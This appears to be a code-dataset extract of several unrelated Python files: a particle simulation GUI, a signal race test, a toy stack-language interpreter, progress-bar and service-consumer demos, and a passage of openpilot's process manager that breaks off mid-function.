source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
pib.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from sys import argv
from PySide import QtGui, QtCore
from PySide.QtOpenGL import QGLWidget
from particles.gui import Ui_NewExperimentWindow, Ui_DemonstrationWindow
from particles.simulation import Simulator, Playback
from OpenGL.GL import (glShadeModel, glClearColor, glClearDepth, glEnable,
glMatrixMode, glDepthFunc, glHint, glOrtho,
glViewport, glLoadIdentity, glClear,
glColor3f, glLineWidth,
GL_SMOOTH, GL_DEPTH_TEST, GL_PROJECTION, GL_LEQUAL,
GL_PERSPECTIVE_CORRECTION_HINT, GL_NICEST,
GL_MODELVIEW, GL_COLOR_BUFFER_BIT, GL_DEPTH_BUFFER_BIT,
GL_TRIANGLE_FAN, GL_LINE_STRIP, GL_VERTEX_ARRAY,
glEnableClientState, GL_DOUBLE, glVertexPointer,
glDrawArrays, glColorPointer, GL_UNSIGNED_BYTE,
GL_COLOR_ARRAY, glDisableClientState)
import OpenGL.arrays.vbo as glvbo
import datetime
import os.path
import struct
import argparse
import numpy as np
import signal
import subprocess
import threading
import collections
from math import sin, cos, radians, pi
BASE_PATH = os.path.dirname(os.path.realpath(__file__))
EXEC_CMD = os.path.join(BASE_PATH, "pib-generate")
def read_from_pipe(process, append_func):
for line in iter(process.stdout.readline, ""):
append_func(line)
def simulate(box_width: float, box_height: float,
delta_v_top: float, delta_v_bottom: float,
delta_v_side: float,
barrier_x: float, barrier_width: float, hole_y: float,
hole_height: float,
min_to_simulate: int,
output_file: str,
v_loss: float, particle_r: float,
deque: collections.deque,
n_left: int = 500, n_right: int = 500,
v_init: float = 0.0,
g: float = 9.8,
fps: int = 30,
):
params = [str(x) for x in (n_left, n_right, particle_r, v_init, v_loss,
box_width, box_height, barrier_x, barrier_width,
hole_y, hole_height, delta_v_top,
delta_v_bottom, delta_v_side, g,
min_to_simulate, fps, output_file)]
process = subprocess.Popen([EXEC_CMD] + params, stdout=subprocess.PIPE,
bufsize=1, universal_newlines=True)
t = threading.Thread(target=read_from_pipe, args=(process, deque.append))
t.daemon = True
t.start()
return process
class ParticleWidget(QGLWidget):
COLOR_LEFT = (255, 0, 0)
COLOR_RIGHT = (0, 255, 0)
def __init__(self, playback, parent=None):
super(ParticleWidget, self).__init__(parent=parent)
self.playback = playback
particle_r = playback.simulator.particle_r
self.xy_offset = np.vstack((
np.array([(particle_r * cos(radians(x)),
particle_r * sin(radians(x)))
for x in range(0, 361, 45)]),
(0, 0)
))
self.xy_size = self.xy_offset.shape[0]
self.update_particle_data()
self.initializeGL()
self.paintGL()
def initializeGL(self):
glShadeModel(GL_SMOOTH)
glClearColor(0.05, 0.05, 0.05, 1.0)
glClearDepth(1.0)
glEnable(GL_DEPTH_TEST)
glMatrixMode(GL_PROJECTION)
glDepthFunc(GL_LEQUAL)
glHint(GL_PERSPECTIVE_CORRECTION_HINT, GL_NICEST)
self.vbo_xy = glvbo.VBO(self.particle_xy)
self.vbo_color = glvbo.VBO(self.particle_color)
simulator = self.playback.simulator
self.vbo_barrier = glvbo.VBO(np.array([
simulator.barrier_x_left, simulator.box_height,
simulator.barrier_x_left, simulator.hole_y_top,
simulator.barrier_x_right, simulator.hole_y_top,
simulator.barrier_x_right, simulator.box_height,
simulator.barrier_x_left, 0,
simulator.barrier_x_left, simulator.hole_y_bottom,
simulator.barrier_x_right, simulator.hole_y_bottom,
simulator.barrier_x_right, 0,
]))
def update_particle_data(self):
self.particle_xy = np.array([(p.pos_x + x, p.pos_y + y)
for p in
self.playback.simulator.particles
for (x, y) in self.xy_offset])
self.particle_color = np.array([x
for p in
self.playback.simulator.particles
for i in range(self.xy_size)
for x in
(self.COLOR_RIGHT if p.id & 1
else self.COLOR_LEFT)
], dtype=np.ubyte)
def resizeGL(self, width, height):
glViewport(0, 0, width, height)
glOrtho(0.0, self.playback.simulator.box_width,
0.0, self.playback.simulator.box_height,
0.0, 1.0)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
def clearGL(self):
glClearColor(0.05, 0.05, 0.05, 1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
def deleteBuffers(self):
self.vbo_color.unbind()
self.vbo_barrier.unbind()
self.vbo_xy.unbind()
del self.vbo_color
del self.vbo_barrier
del self.vbo_xy
def paintGL(self):
self.clearGL()
glLoadIdentity()
simulator = self.playback.simulator
self.update_particle_data()
glEnableClientState(GL_COLOR_ARRAY)
self.vbo_color.set_array(self.particle_color)
self.vbo_color.bind()
glColorPointer(3, GL_UNSIGNED_BYTE, 0, self.vbo_color)
self.vbo_color.unbind()
glEnableClientState(GL_VERTEX_ARRAY)
self.vbo_xy.set_array(self.particle_xy)
self.vbo_xy.bind()
glVertexPointer(2, GL_DOUBLE, 0, self.vbo_xy)
particle_size = self.xy_size
for i in range(len(simulator)):
glDrawArrays(GL_TRIANGLE_FAN, i * particle_size, particle_size)
glDisableClientState(GL_COLOR_ARRAY)
self.vbo_xy.unbind()
glColor3f(1, 1, 1)
glLineWidth(2)
self.vbo_barrier.bind()
glVertexPointer(2, GL_DOUBLE, 0, self.vbo_barrier)
glDrawArrays(GL_LINE_STRIP, 0, 4)
glDrawArrays(GL_LINE_STRIP, 4, 4)
self.vbo_barrier.unbind()
def on_render_scene(self):
self.paintGL()
self.updateGL()
class DemonstrationWindow(QtGui.QMainWindow):
def __init__(self, file_name, parent=None):
super(DemonstrationWindow, self).__init__(parent=parent)
self.playback = Playback(file_name)
self.ui = Ui_DemonstrationWindow()
self.ui.setupUi(self)
self.label_time_original = self.ui.label_time.text()
self.ui.canvas = ParticleWidget(self.playback,
parent=self.ui.frame_player)
self.ui.canvas.setFixedSize(self.ui.frame_player.size())
self.ui.current_state.setMaximum(len(self.playback))
self.ui.button_play.clicked.connect(self.on_button_play_pressed)
self.stopped = False
self.timer = QtCore.QTimer(parent=self)
self.timer.timeout.connect(self.on_timer_executed)
self.ui.current_state.sliderPressed.connect(
self.on_scrollbar_pressed)
self.ui.current_state.sliderReleased.connect(
self.on_scrollbar_released)
self.ui.current_state.valueChanged.connect(
self.on_scrollbar_value_changed)
self.ui.button_backward.clicked.connect(self.previous_state)
self.ui.button_forward.clicked.connect(self.next_state)
self.ui.plot_maxwell.setTitle("Maxwell distribution")
self.ui.plot_maxwell.setLabel('bottom', 'Speed', units='m/s')
self.ui.plot_maxwell.setLabel('left', 'Number of particles',
units='')
self.ui.plot_boltzmann.setTitle("Boltzmann distribution")
self.ui.plot_boltzmann.setLabel('bottom', 'height', units='m')
self.ui.plot_boltzmann.setLabel('left', 'Number of particles',
units='')
self.start_playback()
def closeEvent(self, *args, **kwargs):
self.ui.canvas.deleteBuffers()
def stop_playback(self):
self.stopped = True
self.ui.button_play.setText("▷")
self.timer.stop()
def launch_timer(self):
fps = self.ui.fps.value()
time_step = int(1000 / fps)
self.timer.start(time_step)
def start_playback(self):
self.stopped = False
self.launch_timer()
self.ui.button_play.setText("▯▯")
def update_boltzmann_plot(self, data):
self.ui.plot_boltzmann.clear()
data_sorted = sorted((x.pos_y for x in data), reverse=True)
y, x = np.histogram(data_sorted, bins=20, density=True)
self.ui.plot_boltzmann.plot(x, y, stepMode=True, fillLevel=0,
brush=(126, 5, 80, 150))
def update_maxwell_plot(self, data):
self.ui.plot_maxwell.clear()
data_sorted = sorted((x.speed() for x in data), reverse=True)
y, x = np.histogram(data_sorted, bins=20, density=True)
self.ui.plot_maxwell.plot(x, y, stepMode=True, fillLevel=0,
brush=(126, 5, 80, 150))
v_probable = x[np.argmax(y)]
offset = np.max(np.diff(x)) / 2
k = 4 / np.sqrt(pi) * ((1 / v_probable) ** 3)
y_theoretical = np.array(
[k * (val * val) * np.exp(-(val * val) / (v_probable * v_probable))
for val in x])
self.ui.plot_maxwell.plot(np.add(x, offset), y_theoretical,
stepMode=False,
brush=(255, 255, 255, 255))
def update_plot(self, data):
"""
Update plots
This method is used to call other methods that are handling
plotting of specific data, i.e. Maxwell or Botlzmann distribution
Data passed to this method is a copy of original particle, so any
manipulation is safe
:param data:
:return:
"""
self.update_maxwell_plot(data)
self.update_boltzmann_plot(data)
def previous_state(self):
try:
self.ui.current_state.setValue(
self.ui.current_state.value() - 1)
except (IOError, struct.error, ValueError) as err:
self.stop_playback()
def next_state(self):
try:
self.ui.current_state.setValue(
self.ui.current_state.value() + 1)
except (IOError, struct.error, ValueError) as err:
self.stop_playback()
def on_timer_executed(self):
if self.stopped or self.sender() != self.timer:
return
self.next_state()
self.launch_timer()
def on_button_play_pressed(self):
if self.stopped:
self.start_playback()
else:
self.stop_playback()
def on_scrollbar_pressed(self):
self.timer.stop()
def on_scrollbar_released(self):
if not self.stopped:
self.launch_timer()
def on_scrollbar_value_changed(self, new_state):
try:
self.playback.set_state(new_state)
self.ui.canvas.on_render_scene()
self.ui.label_time.setText(
self.label_time_original.format(
time=self.playback.simulator.time_elapsed
)
)
self.update_plot(self.playback.simulator.state())
except (IOError, ValueError):
pass
class NewExperimentWindow(QtGui.QMainWindow):
def __init__(self, parent=None):
super(NewExperimentWindow, self).__init__(parent=parent)
# Set up UI
self.ui = Ui_NewExperimentWindow()
self.ui.setupUi(self)
self.ui.label_clear_file_name.setVisible(False)
self.label_input_text = self.ui.label_input_file_name.text()
self.input_file = None
self.ui.label_input_file_name.mouseReleaseEvent = self.set_input_file_path_on_click
self.ui.label_clear_file_name.mouseReleaseEvent = self.clear_input_file_path_on_click
self.ui.output_file.setText(datetime.datetime.now().strftime(
"particles_in_box_%Y-%m-%d-%H-%M.bin"))
# Connect slots to signals
self.ui.button_run.clicked.connect(self.run_simulation)
# File selection dialog
self.ui.output_file_button.clicked.connect(
self.set_output_file_path)
def set_input_file(self, file_path):
self.input_file = file_path
if file_path:
self.ui.label_clear_file_name.setVisible(True)
self.ui.label_input_file_name.setText(
"Opening file: {file_path}".format(
file_path=os.path.basename(file_path))
)
self.ui.box_width.setEnabled(False)
self.ui.box_height.setEnabled(False)
self.ui.delta_v_top.setEnabled(False)
self.ui.delta_v_bottom.setEnabled(False)
self.ui.delta_v_side.setEnabled(False)
self.ui.barrier_x.setEnabled(False)
self.ui.barrier_width.setEnabled(False)
self.ui.hole_y.setEnabled(False)
self.ui.hole_height.setEnabled(False)
self.ui.v_loss.setEnabled(False)
self.ui.particle_r.setEnabled(False)
self.ui.g.setEnabled(False)
self.ui.n_left.setEnabled(False)
self.ui.n_right.setEnabled(False)
self.ui.v_init.setEnabled(False)
self.ui.fps.setEnabled(False)
self.ui.simulation_time.setEnabled(False)
self.ui.output_file.setEnabled(False)
self.ui.output_file_button.setEnabled(False)
else:
self.ui.label_input_file_name.setText(self.label_input_text)
self.ui.label_clear_file_name.setVisible(False)
self.ui.box_width.setEnabled(True)
self.ui.box_height.setEnabled(True)
self.ui.delta_v_top.setEnabled(True)
self.ui.delta_v_bottom.setEnabled(True)
self.ui.delta_v_side.setEnabled(True)
self.ui.barrier_x.setEnabled(True)
self.ui.barrier_width.setEnabled(True)
self.ui.hole_y.setEnabled(True)
self.ui.hole_height.setEnabled(True)
self.ui.v_loss.setEnabled(True)
self.ui.particle_r.setEnabled(True)
self.ui.g.setEnabled(True)
self.ui.n_left.setEnabled(True)
self.ui.n_right.setEnabled(True)
self.ui.v_init.setEnabled(True)
self.ui.fps.setEnabled(True)
self.ui.simulation_time.setEnabled(True)
self.ui.output_file.setEnabled(True)
self.ui.output_file_button.setEnabled(True)
def set_input_file_path_on_click(self, ev):
file_path, _ = QtGui.QFileDialog.getOpenFileName(self, 'Open:',
filter="*.bin")
self.set_input_file(file_path or None)
def clear_input_file_path_on_click(self, ev):
self.set_input_file(None)
def set_output_file_path(self):
file_path, _ = QtGui.QFileDialog.getSaveFileName(self, 'Save as:',
filter="*.bin")
self.ui.output_file.setText(file_path)
def run_simulation(self):
if self.input_file:
demo_window = DemonstrationWindow(self.input_file, parent=self)
demo_window.show()
self.hide()
return
box_width = self.ui.box_width.value()
box_height = self.ui.box_height.value()
delta_v_top = self.ui.delta_v_top.value()
delta_v_bottom = self.ui.delta_v_bottom.value()
delta_v_side = self.ui.delta_v_side.value()
barrier_x = self.ui.barrier_x.value()
barrier_width = self.ui.barrier_width.value()
hole_y = self.ui.hole_y.value()
hole_height = self.ui.hole_height.value()
v_loss = self.ui.v_loss.value()
particle_r = self.ui.particle_r.value()
g = self.ui.g.value()
n_left = self.ui.n_left.value()
n_right = self.ui.n_right.value()
v_init = self.ui.v_init.value()
fps = self.ui.fps.value()
min_to_simulate = self.ui.simulation_time.value()
output_file = self.ui.output_file.text()
try:
self.dialog = QtGui.QProgressDialog(
"Simulating into " + os.path.basename(output_file),
"Cancel",
0,
min_to_simulate * 60)
self.dialog.show()
self.dialog.setValue(0)
self.progress = collections.deque(maxlen=1)
self.simulator = simulate(n_left=n_left,
n_right=n_right,
particle_r=particle_r,
v_init=v_init,
v_loss=v_loss,
box_width=box_width,
box_height=box_height,
barrier_x=barrier_x,
barrier_width=barrier_width,
hole_y=hole_y,
hole_height=hole_height,
delta_v_top=delta_v_top,
delta_v_bottom=delta_v_bottom,
delta_v_side=delta_v_side,
g=g,
min_to_simulate=min_to_simulate,
fps=fps,
output_file=output_file,
deque=self.progress)
self.hide()
self.timer = QtCore.QTimer(parent=self)
self.timer.start(100)
self.timer.timeout.connect(self.update_progress)
except IOError as e:
QtGui.QMessageBox.critical(self, "Error!", str(e))
def update_progress(self):
try:
result = self.progress.pop()
self.dialog.setValue(int(result))
except IndexError: # if empty or finished
if self.simulator.poll() is not None:
self.timer.stop()
window = DemonstrationWindow(self.ui.output_file.text(),
parent=self)
window.show()
# otherwise, do nothing
def sigint_handler(*args):
QtGui.QApplication.quit()
if __name__ == "__main__":
signal.signal(signal.SIGINT, sigint_handler)
parser = argparse.ArgumentParser()
parser.add_argument("input", nargs="?",
type=argparse.FileType(mode="rb"),
default=None)
args = parser.parse_args()
app = QtGui.QApplication(argv)
if args.input:
main_window = DemonstrationWindow(args.input.name)
else:
main_window = NewExperimentWindow()
main_window.show()
# Timer is made in order to let program handle SIGINT
timer = QtCore.QTimer()
timer.start(500)
timer.timeout.connect(lambda: None)
exit(app.exec_())
|
wakeup-fd-racer.py
|
import os
import signal
import threading
import time
import socket
import select
import itertools
# Equivalent to the C function raise(), which Python doesn't wrap
if os.name == "nt":
import cffi
_ffi = cffi.FFI()
_ffi.cdef("int raise(int);")
_lib = _ffi.dlopen("api-ms-win-crt-runtime-l1-1-0.dll")
signal_raise = getattr(_lib, "raise")
else:
def signal_raise(signum):
# Use pthread_kill to make sure we're actually using the wakeup fd on
# Unix
signal.pthread_kill(threading.get_ident(), signum)
def raise_SIGINT_soon():
time.sleep(1)
signal_raise(signal.SIGINT)
# Sending 2 signals becomes reliable, as we'd expect (because we need
# set-flags -> write-to-fd, and doing it twice does
# write-to-fd -> set-flags -> write-to-fd -> set-flags)
#signal_raise(signal.SIGINT)
def drain(sock):
total = 0
try:
while True:
total += len(sock.recv(1024))
except BlockingIOError:
pass
return total
def main():
writer, reader = socket.socketpair()
writer.setblocking(False)
reader.setblocking(False)
signal.set_wakeup_fd(writer.fileno())
# Keep trying until we lose the race...
for attempt in itertools.count():
print(f"Attempt {attempt}: start")
# Make sure the socket is empty
drained = drain(reader)
if drained:
print(f"Attempt {attempt}: ({drained} residual bytes discarded)")
# Arrange for SIGINT to be delivered 1 second from now
thread = threading.Thread(target=raise_SIGINT_soon)
thread.start()
# Fake an IO loop that's trying to sleep for 10 seconds (but will
# hopefully get interrupted after just 1 second)
start = time.perf_counter()
target = start + 10
try:
select_calls = 0
drained = 0
while True:
now = time.perf_counter()
if now > target:
break
select_calls += 1
r, _, _ = select.select([reader], [], [], target - now)
if r:
# In theory we should loop to fully drain the socket but
# honestly there's 1 byte in there at most and it'll be
# fine.
drained += drain(reader)
except KeyboardInterrupt:
pass
else:
print(f"Attempt {attempt}: no KeyboardInterrupt?!")
# We expect a successful run to take 1 second, and a failed run to
# take 10 seconds, so 2 seconds is a reasonable cutoff to distinguish
# them.
duration = time.perf_counter() - start
if duration < 2:
print(f"Attempt {attempt}: OK, trying again "
f"(select_calls = {select_calls}, drained = {drained})")
else:
print(f"Attempt {attempt}: FAILED, took {duration} seconds")
print(f"select_calls = {select_calls}, drained = {drained}")
break
thread.join()
if __name__ == "__main__":
main()
|
5D.py
|
from sys import setrecursionlimit
import threading
setrecursionlimit(10 ** 9)
threading.stack_size(67108864)
def main():
file_input = open("quack.in", 'r')
file_output = open("quack.out", 'w')
current = file_input.readline().strip()
actions, marks = [], []
def move_to(mark):
for i in range(len(marks)):
if marks[i][0] == mark:
return marks[i][1]
return
def validate_que(length):
return True if (length == 0) else False
class ImplementedQueue():
def __init__(self):
self.que = []
self.head = 0
self.tail = 0
def push_value(self, value):
self.que += ['']
self.que[self.tail] = value
self.tail += 1
def pop_value(self):
try:
if validate_que(self.tail - self.head):
return
else:
self.head += 1
return self.que[self.head - 1]
except IndexError:
return
Quack = ImplementedQueue()
registers = [0] * 26
while (current):
actions.append(current)
current = file_input.readline().strip()
for i in range(len(actions)):
if actions[i][0] == ':':
marks.append([actions[i][1:], i])
i, current_action = 0, ''
a, b, temp = 0, 0, 0
#print(actions)
while i < len(actions):
current_action = actions[i]
if current_action[0] == 'Q':
break
elif current_action[0] == '+':
Quack.push_value((Quack.pop_value() + Quack.pop_value()) % 65536)
elif current_action[0] == '-':
Quack.push_value((Quack.pop_value() - Quack.pop_value()) % 65536)
elif current_action[0] == '*':
Quack.push_value((Quack.pop_value() * Quack.pop_value()) % 65536)
elif current_action[0] == '/':
a, b = Quack.pop_value(), Quack.pop_value()
if b == 0:
Quack.push_value(0)
else:
Quack.push_value((a // b) % 65536)
elif current_action[0] == '%':
a, b = Quack.pop_value(), Quack.pop_value()
if b == 0:
Quack.push_value(0)
else:
Quack.push_value((a % b) % 65536)
elif current_action[0] == '>':
registers[ord(current_action[1]) - ord('a')] = Quack.pop_value()
#print(registers[ord(current_action[1]) - ord('a')])
elif current_action[0] == '<':
Quack.push_value(registers[ord(current_action[1]) - ord('a')])
elif current_action[0] == 'P':
if len(current_action) > 1:
temp = registers[ord(current_action[1]) - ord('a')]
else:
temp = Quack.pop_value()
print(temp, file=file_output)
elif current_action[0] == 'C':
if len(current_action) > 1:
temp = registers[ord(current_action[1]) - ord('a')]
else:
temp = Quack.pop_value()
print(chr(temp % 256), end='', file=file_output)
elif current_action[0] == ':':
i += 1
i -= 1
elif current_action[0] == 'J':
i = move_to(actions[i][1:])
elif current_action[0] == 'Z':
if registers[ord(current_action[1]) - ord('a')] == 0:
i = move_to(actions[i][2:])
elif current_action[0] == 'E':
if registers[ord(current_action[1]) - ord('a')] == registers[ord(current_action[2]) - ord('a')]:
i = move_to(actions[i][3:])
elif current_action[0] == 'G':
if registers[ord(current_action[1]) - ord('a')] > registers[ord(current_action[2]) - ord('a')]:
i = move_to(actions[i][3:])
else:
Quack.push_value(int(current_action))
#print(current_action)
i += 1
#print(registers)
file_output.close()
thread = threading.Thread(target=main)
thread.start()
|
a-lot-of-parallel-tasks.py
|
#!/usr/bin/env python
"""
More complex demonstration of what's possible with the progress bar.
"""
from __future__ import unicode_literals
from prompt_toolkit.shortcuts.progress_bar import progress_bar
from prompt_toolkit import HTML
import random
import threading
import time
def main():
with progress_bar(
title=HTML('<b>Example of many parallel tasks.</b>'),
bottom_toolbar=HTML('<b>[Control-L]</b> clear <b>[Control-C]</b> abort')) as pb:
def run_task(label, total, sleep_time):
for i in pb(range(total), label=label):
time.sleep(sleep_time)
threads = []
for i in range(160):
label = 'Task %i' % i
total = random.randrange(50, 200)
sleep_time = random.randrange(5, 20) / 100.
threads.append(threading.Thread(target=run_task, args=(label, total, sleep_time)))
for t in threads:
t.daemon = True
t.start()
# Wait for the threads to finish. We use a timeout for the join() call,
# because on Windows, join cannot be interrupted by Control-C or any other
# signal.
for t in threads:
while t.is_alive():
t.join(timeout=.5)
if __name__ == '__main__':
main()
|
consumer.py
|
#!/usr/bin/python
# -- Content-Encoding: UTF-8 --
"""
Greeting service consumer
:author: Thomas Calmant
:copyright: Copyright 2015, Thomas Calmant
:license: Apache License 2.0
..
Copyright 2015 Thomas Calmant
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Module version
__version_info__ = (0, 5, 9)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
# ------------------------------------------------------------------------------
# iPOPO decorators
from pelix.ipopo.decorators import ComponentFactory, Requires, Instantiate, \
BindField, UnbindField, Validate
# Pelix constants
import pelix.constants
# Standard library
import threading
# ------------------------------------------------------------------------------
# Service specification
SERVICE_SPECIFICATION = "sample.grettings"
# ------------------------------------------------------------------------------
@ComponentFactory("hello-world-consumer")
@Requires("_services", SERVICE_SPECIFICATION, aggregate=True, optional=True)
@Instantiate("consumer")
class HelloWorldConsumer(object):
"""
Simple greeting service consumer
"""
def __init__(self):
"""
Sets up members
"""
self._services = []
self._fw_uid = None
def _use_service(self, service):
"""
Calls the given greeting service
:param service: A greeting service
"""
service.sayHello("from {0} (Pelix framework)".format(self._fw_uid))
@BindField('_services', if_valid=True)
def bind_greeting(self, field, service, reference):
"""
A greeting service has been bound
:param field: Name of the injected field
:param service: The injected service
:param reference: Reference of the injected service
"""
# Trace something
print("A new greeting service has been bound")
# Use the service. Use a thread to avoid locking iPOPO for too long
threading.Thread(target=self._use_service, args=[service]).start()
@UnbindField('_services', if_valid=True)
def unbind_greeting(self, field, service, reference):
"""
A greeting service has been bound
:param field: Name of the injected field
:param service: The injected service
:param reference: Reference of the injected service
"""
# Trace something
print("A greeting service is gone")
# Avoid to use the service here, as its proxy might have already been
# disconnected
@Validate
def validate(self, context):
"""
Component validated
:param context: Bundle context
"""
# Get the framework UID
self._fw_uid = context.get_property(pelix.constants.FRAMEWORK_UID)
# Print it
print("This framework has UID: {0}".format(self._fw_uid))
# Use existing services
for service in self._services:
# Use the service. Use a thread to avoid locking iPOPO for too long
threading.Thread(target=self._use_service, args=[service]).start()
|
sitealgo_main.py
|
# - config: The path to the config file for the cloud algo
#
# Usage: python -m sitealgo_main -config=../config/sitealgo_config.json
import sys
sys.path.append('../')
from sitealgo.site_algo import SiteAlgo
import multiprocessing
import argparse
# Parse command line arguments
parser = argparse.ArgumentParser()
parser.add_argument("-config", "--config", default="../config/sitealgo0_config.json", help="Path to the config file")
args = parser.parse_args()
if __name__ == "__main__":
node = SiteAlgo(args.config)
serverProcess = multiprocessing.Process(target=node.serve)
serverProcess.start()
|
manager.py
|
#!/usr/bin/env python3
import datetime
import importlib
import os
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import textwrap
import time
import traceback
from multiprocessing import Process
from typing import Dict, List
from common.basedir import BASEDIR
from common.spinner import Spinner
from common.text_window import TextWindow
from selfdrive.hardware import HARDWARE, EON, PC
from selfdrive.swaglog import cloudlog, add_logentries_handler
os.environ['BASEDIR'] = BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
TOTAL_SCONS_NODES = 1040
WEBCAM = os.getenv("WEBCAM") is not None
PREBUILT = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL, fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit satus
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
# Run scons
spinner = Spinner()
spinner.update("0")
if __name__ != "__main__":
spinner.close()
def build():
for retry in [False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else f"-j{nproc - 1}"
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache", ignore_errors=True)
shutil.rmtree("/data/scons_cache", ignore_errors=True)
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
spinner.close()
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
if __name__ == "__main__" and not PREBUILT:
build()
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from selfdrive.hardware.eon.apk import update_apks, pm_apply_packages, start_offroad
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
#"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
#"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
#"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
#"tombstoned": "selfdrive.tombstoned",
#"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
#"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
'updated',
'logcatd',
'tombstoned',
'sensord',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'locationd',
'clocksd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if not PC or WEBCAM:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if EON:
car_started_processes += [
'gpsd',
'rtshield',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
